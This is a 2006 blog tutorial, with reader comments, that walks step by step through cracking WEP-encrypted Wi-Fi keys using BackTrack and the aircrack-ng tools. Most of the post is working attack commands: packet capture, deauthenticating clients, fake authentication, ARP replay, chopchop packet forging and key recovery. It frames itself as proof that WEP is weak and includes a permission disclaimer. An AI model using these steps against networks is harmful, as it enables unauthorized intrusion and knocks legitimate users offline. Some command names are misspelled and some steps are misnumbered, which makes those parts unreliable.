Cracking WEP: The ultimate guide

posted on August 2nd, 2006


##### Why did you publish this guide? #####

Some people at school where telling me that everyone should encrypt with a WEP encryption, in order to make sure that your passwords are safe. When I told that that everyone can hack a WEP encrypted network in just a matter of minutes they didn’t believe me… This guide is here for all non-believers. It is possible to crack WEP keys and it’s easy.

If you want to be safe, use at least a WPA encrytion, and if possible with a long and non-dictionary key. Check out the WPA cracking guide to test if your key is safe enough.

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng –ivs -w capture [wireless interface]

5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!

##### Generating data, method one: There are clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –arpreplay -e [the SSID you found with airodump] -b [the BSSID you found wth airodump] -h [the client’s MAC adress]

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]

3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (do NOT press the enter button!)

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button!):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.

3. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06

4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)

5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.

6. open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap

7. In a new or in the same terinal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)

or

airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)

If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:

airecrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!

##### Disclaimer #####

I don’t think have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.

##### Donations #####

I hope you enjoyed reading this guide. I did enjoy writing it, but I really don’t enjoy paying the bills for hosting and bandwidth. Please help me keeping this site up and make a small paypal donation to paypal@profit42.com.

Thanks.

6 comments:

  1. Samuel Colburn said on August 2nd, 2006 at 9:47 pm :

    Thanks for the clean, printable guide. Well done!

    Although it isn’t in the scope of this document to go over it in depth, it might be nice to mention the limitations of different cards, and how some are likely better suited than others for this job.

  2. Ne0 @ WorK said on August 9th, 2006 at 8:39 pm :

    yea for what os does this work on linux or osx windows???

  3. admin said on August 9th, 2006 at 11:46 pm :

    @Ne0

    It uses a linux distribution based on slax named BackTrack. You can either install it or use the live cd. If you want to install it, you need 2 partitions, a swap and a real one. Just follow the instructions in the hd install option on the live cd, it’s pretty self explaining.

    If you already have a linux distrubution installed you can download the aircrack-ng suite (www.aircrack-ng.org/). The commands will be the same.

    There are ways to do this on a Mac with a program named kismac, but that’s a completely different story. Maybe I’ll write about it later.

    If you want to do this on windows: It is technically possible, but it’ll take hours because windows doesn’t support package injection for some unnown reason.

  4. BaNZ said on November 17th, 2006 at 9:35 pm :

    I tried cracking my own network 128bit Wep. Seems like i got a very very good key :) Been half an hour now and still can’t crack it.

    Got lots of random numbers and alphabets in my password.

  5. crack0re said on April 6th, 2007 at 1:41 am :

    I smoke crack before I hack.

  6. Zibrah3ed said on December 13th, 2007 at 9:05 pm :

    Way late in commenting,but Banz your an idiot. This method attacks the encryption not the pw. Your password could be @#rAfdHjk% or cat. Either one will be detedted in the same amount of time.

Leave a Reply